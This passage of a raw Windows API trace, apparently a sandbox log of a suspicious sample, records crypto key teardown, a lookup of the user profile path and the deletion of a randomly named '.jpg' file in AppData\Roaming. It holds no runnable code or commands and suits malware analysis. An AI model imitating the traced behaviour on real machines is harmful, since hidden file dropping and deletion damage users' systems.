lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.125] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0123.125] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.125] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0123.125] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.125] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.125] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.125] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0123.125] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.125] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0123.125] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0123.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa4e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0123.125] CryptDestroyKey (hKey=0x9a43c0) returned 1 [0123.125] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.126] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0123.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.126] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0123.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.126] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0123.126] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0123.126] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0123.126] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.126] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.126] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0123.126] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.126] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.126] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.127] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0123.127] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.127] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0123.127] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.132] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0123.132] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.132] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0123.132] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.132] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.133] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.133] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.133] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.133] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.133] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.133] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.133] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.133] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0123.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.133] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0123.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0123.133] CryptReleaseContext (hProv=0x9beab0, dwFlags=0x0) returned 1 [0123.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.134] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.134] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.134] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.134] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.134] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.134] FreeLibrary (hLibModule=0x76390000) returned 1 [0123.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.134] CloseHandle (hObject=0x4f0) returned 1 [0123.135] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.135] CloseHandle (hObject=0x4f4) returned 1 [0123.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.138] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.138] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0123.138] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0123.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0123.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0123.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0123.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0123.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0123.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0123.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0123.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0123.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0123.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0123.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0123.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6a) returned 0x29f3ee0 [0123.139] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/m3JGHdzSozsPviDT.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\m3JGHdzSozsPviDT.jpg", lpFilePart=0x8cedf4*="m3JGHdzSozsPviDT.jpg") returned 0x34 [0123.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0123.139] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\m3JGHdzSozsPviDT.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\m3jghdzsozspvidt.jpg")) returned 0x20 [0123.139] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\m3JGHdzSozsPviDT.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc403710, ftCreationTime.dwHighDateTime=0x1d5d443, ftLastAccessTime.dwLowDateTime=0x6b4df440, ftLastAccessTime.dwHighDateTime=0x1d5ca6b, ftLastWriteTime.dwLowDateTime=0x6b4df440, ftLastWriteTime.dwHighDateTime=0x1d5ca6b, nFileSizeHigh=0x0, nFileSizeLow=0xf524, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="m3JGHdzSozsPviDT.jpg", cAlternateFileName="M3JGHD~1.JPG")) returned 0x9a47c0 [0123.140] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\m3JGHdzSozsPviDT.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\m3jghdzsozspvidt.jpg")) returned 1 [0123.157] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc403710, ftCreationTime.dwHighDateTime=0x1d5d443, ftLastAccessTime.dwLowDateTime=0x6b4df440, ftLastAccessTime.dwHighDateTime=0x1d5ca6b, ftLastWriteTime.dwLowDateTime=0x6b4df440, ftLastWriteTime.dwHighDateTime=0x1d5ca6b, nFileSizeHigh=0x0, nFileSizeLow=0xf524, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="m3JGHdzSozsPviDT.jpg", cAlternateFileName="M3JGHD~1.JPG")) returned 0 [0123.157] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0123.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0123.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0123.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0123.158] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0123.158] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0123.158] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0123.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0123.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0123.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0123.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0123.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0123.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0123.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0123.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0123.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0123.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0123.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0123.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6a) returned 0x29f3ee0 [0123.160] 